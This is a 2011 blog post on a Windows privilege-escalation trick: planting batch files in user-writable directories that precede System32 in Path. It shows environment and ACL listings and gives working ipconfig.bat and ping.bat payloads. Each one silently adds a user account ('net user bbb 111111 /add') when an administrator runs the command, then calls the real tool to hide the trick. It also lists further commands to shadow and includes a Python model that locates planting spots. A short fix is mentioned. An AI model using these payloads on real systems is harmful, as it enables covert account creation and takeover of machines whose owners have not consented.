A ten-year-old privilege escalation trick: will it live forever?

Start with the environment of a user on a Windows XP/2003-era machine. Note the order of the entries in Path, and which of them come before C:\WINDOWS\system32:

E:\>set
COMPUTERNAME=ROOT
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\mm
LOGONSERVER=\\ROOT
NLS_LANG=AMERICAN_AMERICA.ZHS16GBK
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=E:\Perl\site\bin;E:\Perl\bin;E:\Program Files\Metasploit\Framework3\bin;E:\Python26\Scripts;E:\Python26\;C:\Program Files\PC Connectivity Solution\;E:\Program Files\perl\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Common Files\Lenovo;C:\Program Files\Microsoft SQL Server\80\Tools\BINN;E:\Program Files\Symantec\pcAnywhere\;C:\Program Files\Common Files\Thunder Network\KanKan\Codecs;C:\Program Files\ThinkPad\ConnectUtilities;e:\Program Files\StormII\Codec\QTSystem\;E:\oracle\instantclient_10_2;%APPDATA%\Python\Scripts;e:\Program Files\StormII\Codec;e:\Program Files\StormII;e:\Program Files\Zend\Core\bin;e:\Program Files\Zend\Core\oic;e:\Program Files\Nmap;e:\Program Files\Nmap;C:\Program Files\Common Files\Nero\Lib\;C:\Program Files\Common Files\Nero\Lib\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.py;.pyw;.BOX;.RB;.RBW
PHPRC=E:\php\
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 23 Stepping 6, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=1706
ProgramFiles=C:\Program Files
PROMPT=$P$G
QTJAVA=e:\Program Files\Java\jre1.7.0\lib\ext\QTJava.zip
RUBYOPT=-rubygems
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\xhacker\LOCALS~1\Temp
TMP=C:\DOCUME~1\xhacker\LOCALS~1\Temp
TNS_ADMIN=e:\oracle\instantclient_10_2
TPCCommon=C:\PROGRA~1\THINKV~1\PrdCtr
TVT=C:\Program Files\Lenovo
USERDOMAIN=ROOT
USERNAME=xhacker
USERPROFILE=C:\Documents and Settings\xhacker
windir=C:\WINDOWS
__COMPAT_LAYER=EnableNXShowUI

E:\>cacls E:\Perl\site\bin
E:\Perl\site\bin BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
BUILTIN\Administrators:F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(special access:)
FILE_WRITE_DATA

E:\>cacls "E:\Program Files\perl\bin"
E:\Program Files\perl\bin BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
BUILTIN\Administrators:F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(special access:)
FILE_WRITE_DATA

E:\>cacls E:\Python26\Scripts
E:\Python26\Scripts BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
BUILTIN\Administrators:F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(special access:)
FILE_WRITE_DATA

Many other applications ship with the same directory permissions, php 5.2.x for example; I won't list them all.

Put the two listings together. Each of these directories comes before C:\WINDOWS\system32 in Path, and each gives BUILTIN\Users FILE_WRITE_DATA and FILE_APPEND_DATA on the directory itself ((CI) only, no (OI)): on a directory those two rights mean "create files" and "create subdirectories". With only these ACEs a member of Users can add new files but not change the ones already there, which is why the trick drops a file under a name the directory does not yet contain rather than replacing perl.exe. cmd.exe resolves a bare command name by walking the Path directories in order and trying every PATHEXT extension in each one before moving on, so E:\Perl\site\bin\ipconfig.bat is found before C:\WINDOWS\system32\ipconfig.exe. The planted file runs with the rights of whoever typed the command, so the payload fires the next time an administrator runs ipconfig from a prompt (or anything runs it through cmd /c) with this Path. The .bat form depends on cmd.exe's PATHEXT handling; a program that launches ipconfig via CreateProcess only appends .exe, but it searches the same directory order, so a planted ipconfig.exe in the same writable directory covers that case as well. The fix is as old as the trick: revoke the write ACEs for Users on those directories, or at least keep vendor directories behind %SystemRoot%\system32 in Path.

A batch file does the job quite cleanly:

ipconfig.bat:

@rem Payload runs first; >nul 2>&1 hides its output (including "System error 5" when a non-admin caller triggers it).
@net user bbb 111111 /add>nul 2>&1
@rem Then the real tool, by full path so this .bat does not resolve to itself, with every argument forwarded.
@%systemroot%\system32\ipconfig.exe %*

ping.bat:

@net user bbb 111111 /add>nul 2>&1
@%systemroot%\system32\ping.exe %*

Other commands commonly shadowed the same way: net, ftp, netsh, cacls, tftp, tasklist, netstat, route.
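The lookup order the trick relies on, modelled in Python as an added example (not code from the original post). SAMPLE_PATH (cut after C:\WINDOWS\System32\Wbem), SAMPLE_PATHEXT and the three user-writable directories are taken from the set and cacls listings above; the file inventory, the function names and the planted file names are assumptions made for the demonstration.

```python
"""Model of how cmd.exe turns a bare command name such as `ipconfig` into a file.

Added example, not code from the original post.  cmd.exe searches the current
directory first, then each PATH directory in order, and inside every directory
tries each PATHEXT extension in order.  Directory order therefore beats
extension order: a planted ipconfig.bat in an early PATH directory wins over
System32\\ipconfig.exe, while inside a single directory .EXE still beats .BAT.
"""
from typing import Dict, List, Optional, Set

# Taken from the post's `set` output (PATH truncated after System32\Wbem).
SAMPLE_PATH = ";".join([
    r"E:\Perl\site\bin", r"E:\Perl\bin",
    r"E:\Program Files\Metasploit\Framework3\bin",
    r"E:\Python26\Scripts", "E:\\Python26\\",
    "C:\\Program Files\\PC Connectivity Solution\\",
    r"E:\Program Files\perl\bin",
    r"C:\WINDOWS\system32", r"C:\WINDOWS", r"C:\WINDOWS\System32\Wbem",
])
SAMPLE_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.py;.pyw;.BOX;.RB;.RBW"
# Directories where the post's cacls output shows BUILTIN\Users with FILE_WRITE_DATA.
USER_WRITABLE = {r"E:\Perl\site\bin", r"E:\Program Files\perl\bin", r"E:\Python26\Scripts"}
# Constructed file inventory (assumption): real tools in System32 and the interpreter dirs.
CLEAN_FILES = {
    r"C:\WINDOWS\system32\ipconfig.exe", r"C:\WINDOWS\system32\ping.exe",
    r"C:\WINDOWS\system32\net.exe", r"C:\WINDOWS\system32\cacls.exe",
    r"E:\Python26\python.exe", r"E:\Perl\bin\perl.exe",
}


def parse_list(value: str) -> List[str]:
    """Split a ;-separated PATH/PATHEXT value, dropping empties and trailing backslashes."""
    return [p.strip().rstrip("\\") for p in value.split(";") if p.strip()]


def resolve(command: str, path: str, pathext: str, files: Set[str],
            cwd: Optional[str] = None) -> Optional[str]:
    """Return the file cmd.exe would run for a bare `command`, or None.

    `files` is the set of files present on the box as full paths; matching is
    case-insensitive, as on NTFS/FAT.
    """
    existing = {f.lower(): f for f in files}
    search_dirs = ([cwd.rstrip("\\")] if cwd else []) + parse_list(path)
    exts = parse_list(pathext)
    for directory in search_dirs:      # directory order is decided first ...
        for ext in exts:               # ... extension order only within a directory
            candidate = f"{directory}\\{command}{ext}".lower()
            if candidate in existing:
                return existing[candidate]
    return None


def plant_points(command: str, path: str, pathext: str, files: Set[str],
                 writable: Set[str]) -> List[str]:
    """User-writable PATH directories, in PATH order, where a new <command>.bat
    would be found before the legitimate file.  Only *new* files are considered,
    matching the create-only right the cacls output shows."""
    legit = resolve(command, path, pathext, files)
    dirs = parse_list(path)
    if legit is None:
        stop = len(dirs)               # command absent: any writable dir works
    else:
        legit_dir = legit.rsplit("\\", 1)[0].lower()
        stop = next(i for i, d in enumerate(dirs) if d.lower() == legit_dir)
    wset = {w.rstrip("\\").lower() for w in writable}
    seen: Set[str] = set()
    out: List[str] = []
    for d in dirs[:stop]:
        if d.lower() in wset and d.lower() not in seen:
            seen.add(d.lower())
            out.append(d)
    return out


def demo() -> Dict[str, object]:
    """Walk through the post's scenario and return the observations."""
    planted = CLEAN_FILES | {r"E:\Perl\site\bin\ipconfig.bat"}
    same_dir = CLEAN_FILES | {r"E:\Python26\python.bat"}
    return {
        "clean": resolve("ipconfig", SAMPLE_PATH, SAMPLE_PATHEXT, CLEAN_FILES),
        "hijacked": resolve("ipconfig", SAMPLE_PATH, SAMPLE_PATHEXT, planted),
        # Same directory: .EXE precedes .BAT in PATHEXT, so python.bat loses.
        "same_dir": resolve("python", SAMPLE_PATH, SAMPLE_PATHEXT, same_dir),
        # The current directory is searched before PATH (the post's prompt is E:\>).
        "cwd": resolve("ipconfig", SAMPLE_PATH, SAMPLE_PATHEXT,
                       CLEAN_FILES | {r"E:\ipconfig.bat"}, cwd="E:\\"),
        "ipconfig_plant": plant_points("ipconfig", SAMPLE_PATH, SAMPLE_PATHEXT,
                                       CLEAN_FILES, USER_WRITABLE),
        "python_plant": plant_points("python", SAMPLE_PATH, SAMPLE_PATHEXT,
                                     CLEAN_FILES, USER_WRITABLE),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:15} {value}")
```

Running it shows all three writable directories catching ipconfig, but only E:\Perl\site\bin and E:\Python26\Scripts catching python, because E:\Program Files\perl\bin sits behind E:\Python26 in Path. On a real box, CLEAN_FILES would come from a directory walk and USER_WRITABLE from an ACL check of each Path entry rather than from constants.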

posted on 2011-03-29 04:24 by =_=!  reads (358)  comments (0)
